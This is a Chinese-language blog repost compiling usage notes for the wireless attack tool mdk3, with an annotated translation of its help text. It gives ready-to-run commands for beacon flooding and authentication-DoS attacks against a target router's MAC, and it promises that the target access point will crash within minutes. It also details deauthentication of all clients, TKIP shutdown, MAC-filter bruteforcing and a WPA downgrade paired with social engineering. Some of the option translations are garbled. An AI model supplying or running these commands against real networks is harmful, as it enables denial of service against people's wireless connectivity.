zoukankan      html  css  js  c++  java
  • 收集的有关mdk 3的使用方法

      收集来自网络上的有关mdk3的一些使用方法以及技巧(持续更新)

    b beacon泛洪攻击

    -f 指定wifi名称的文件夹

    -n 加上wifi名称

    -w Fake WEP encrypted stations 设置假的加密wep

    -g Fake 802.11b stations (54 Mbit/s) 设定每秒流速是54mbps

    -c 信道

    -s 设置流速,默认是50 (set speed in packets per second)

    mdk3 wlan0 b -n test -w -g -c 1 -s 200
    ---------------------
    作者:小人物哎
    来源:CSDN
    原文:https://blog.csdn.net/bt517840374/article/details/79998391
    版权声明:本文为博主原创文章,转载请附上博文链接!

    命令为:mdk3 mon0 a -a MAC(MAC为你要攻击的目标MAC)

    开始洪水攻击,大部分路由器1分钟之内所有客户端掉线,3-5分钟对方AP就会当机

    注:本工具使用会对周围无线信号造成较大干扰,甚至导致所在区域全部路由器当机!!!!

    ecerSecTeam原创,转载请注明!

    MDK USAGE:
    mdk3 <interface> <test_mode> [test_options] #mdk3用法:mdk3 网卡 测试模式 测试选项

    TEST MODES: #测试模式

    b - Beacon Flood Mode #信标洪水模式 其实就是制造虚假AP干扰正常AP

    OPTIONS:
    -n <ssid>
    Use SSID <ssid> instead of randomly generated ones #使用SSID <ssid>而不是随机生成的
    -f <filename>
    Read SSIDs from file #从文件中读取SSID
    -v <filename>
    Read MACs and SSIDs from file. #从文件读取MAC和SSID
    -d
    Show station as Ad-Hoc #将站显示为Ad-Hoc
    -w
    Set WEP bit (Generates encrypted networks) #设置WEP位(生成加密网络)
    -g
    Show station as 54 Mbit # 显示工作站为54M
    -t
    Show station using WPA TKIP encryption #使用WPA TKIP加密显示工作站
    -a
    Show station using WPA AES encryption #使用WPA AES加密显示工作站
    -m
    Use valid accesspoint MAC from OUI database #使用来自OUI数据库的有效访问点MAC
    -h
    Hop to channel where AP is spoofed #跳到AP被欺骗的频道
    This makes the test more effective against some devices/drivers #这使得测试对于某些设备/驱动程序更有效
    But it reduces packet rate due to channel hopping. #但它减少了由于信道跳频的分组速率
    -c <chan>
    Fake an AP on channel <chan>. If you want your card to hop on #在频道<chan>上创建AP。如果你想要你的卡上跳
    this channel, you have to set -h option, too! #这个通道,你必须设置-h选项!
    -s <pps>
    Set speed in packets per second (Default: 50) #设置速度(以秒为单位)(默认值:50)
    a - Authentication DoS mode # 身份验证洪水攻击

    OPTIONS:
    -a <ap_mac>
    Only test the specified AP #只测试指定的AP
    -m
    Use valid client MAC from OUI database #从OUI数据库使用有效的客户端MAC
    -c
    Do NOT check for test being successful #不要检查测试是否成功
    -i <ap_mac>
    Perform intelligent test on AP (-a and -c will be ignored) #在AP上执行智能测试(-a和-c将被忽略)
    This test connects clients to the AP and reinjects sniffed data to keep them alive #此测试将客户端连接到AP,并重新注入嗅探的数据以保持活动
    -s <pps>
    Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
    p - Basic probing and ESSID Bruteforce mode #基本探测和ESSID Bruteforce模式

    Use -f and -t option to enable SSID Bruteforcing. #使用-f和-t选项来启用SSID Bruteforcing。
    OPTIONS:
    -e <ssid>
    Tell mdk3 which SSID to probe for # 告诉mdk3要探测的SSID
    -f <filename>
    Read lines from file for bruteforcing hidden SSIDs #从文件中读取行以强制执行隐藏的SSID
    -t <bssid>
    Set MAC adress of target AP #设置目标AP的MAC地址
    -s <pps>
    Set speed (Default: unlimited, in Bruteforce mode: 300) # 设置速度(默认值:无限制,在Bruteforce模式下:300)
    -b <character set>
    Use full Bruteforce mode (recommended for short SSIDs only!) #使用完全的Bruteforce模式(建议只使用短SSID!)
    Use this switch only to show its help screen. #使用此开关仅显示其帮助屏幕

    d - Deauthentication / Disassociation Amok Mode #Deauthentication / Disassociation攻击模式
    Kicks everybody found from AP #踢掉每个客户端
    OPTIONS:
    -w <filename>
    Read file containing MACs not to care about (Whitelist mode) #白名单模式 读取包含MAC的文件以运行测试
    -b <filename>
    Read file containing MACs to run test on (Blacklist Mode) #黑名单模式 读取文件中的运行测试MAC运行测试
    -s <pps>
    Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
    -c [chan,chan,chan,...]
    Enable channel hopping. Without providing any channels, mdk3 will hop an all #设置信道跳跃如果没指定,mdk3会跳一个
    14 b/g channels. Channel will be changed every 5 seconds. #14 b / g通道。信道每5秒更改一次
    m - Michael shutdown exploitation (TKIP) #MAC关闭利用
    Cancels all traffic continuously #连续取消所有流量
    -t <bssid>
    Set Mac address of target AP #设置目标AP的Mac地址
    -w <seconds>
    Seconds between bursts (Default: 10) #突发之间的秒数(默认值:10)
    -n <ppb>
    Set packets per burst (Default: 70) #设置每个数据包的数据包(默认值:70)
    -j
    Use the new TKIP QoS-Exploit #使用新的TKIP QoS-Exploit
    Needs just a few packets to shut AP down! #需要几个数据包才能关闭AP!
    -s <pps>
    Set speed (Default: 400) #设置速度(默认值:400)

    w - WIDS/WIPS/WDS Confusion
    将WDS与多认证客户端混淆,从而弄乱路由表
    -e <SSID>
    SSID of target WDS network #目标WDS网络的SSID
    -c [chan,chan,chan...]
    Use channel hopping #使用信道跳跃
    -z
    激活Zero_Chaos的WIDS攻击
    (验证客户端从WDS到外部AP,使WIDS变得坚果)
    f - MAC filter bruteforce mode #MAC过滤器强制模式
    此测试使用已知客户端MAC地址的列表,并尝试
    在动态改变的同时向给定AP认证它们
    其响应超时以获得最佳性能。它目前只工作
    对正确拒绝开放身份验证请求的AP
    -t <bssid>
    Target BSSID #目标BSSID
    -m <mac>
    Set the MAC adress range to use (3 bytes, i.e. 00:12:34) #设置要使用的MAC地址范围(3字节,即00:12:34)
    Without -m, the internal database will be used #如果没有-m,将使用内部数据库
    -f <mac>
    Set the MAC adress to begin bruteforcing with #设置MAC地址以开始强制
    (Note: You can't use -f and -m at the same time) #(注意:不能同时使用-f和-m)
    g - WPA Downgrade test #WPA降级测试
    deauthenticates发送WPA加密数据包的站和AP。
    有了这个测试,你可以检查sysadmin是否会尝试设置他的
    网络到WEP或禁用加密。 mdk3将使WEP和未加密
    客户端工作,所以如果系统管理员只是认为“WPA是破碎”他
    肯定不是这个工作的正确。
    (这可以/应该与社会工程相结合)
    -t <bssid>
    Target network #目标网络
    ---------------------
    作者:YnKhmIOU
    来源:CSDN
    原文:https://blog.csdn.net/CloudAtlasM/article/details/72763566
    版权声明:本文为博主原创文章,转载请附上博文链接!

  • 相关阅读:
    【两周一本书】大话设计模式
    如何将在AWS上的网站快速从http转换为https
    java中error和exception的区别
    Java IO : NIO与IO的区别
    TCP/TP:DNS区域(Zone)
    Liferay 7:Liferay DXP解决方案
    Eclipse:Eclipse插件开发全套教程
    Liferay 7:Liferay DXP全套教程内附源码
    Liferay 7:Liferay内部博客地址
    Gradle:gradle下载插件
  • 原文地址:https://www.cnblogs.com/moegarn/p/10990572.html
Copyright © 2011-2022 走看看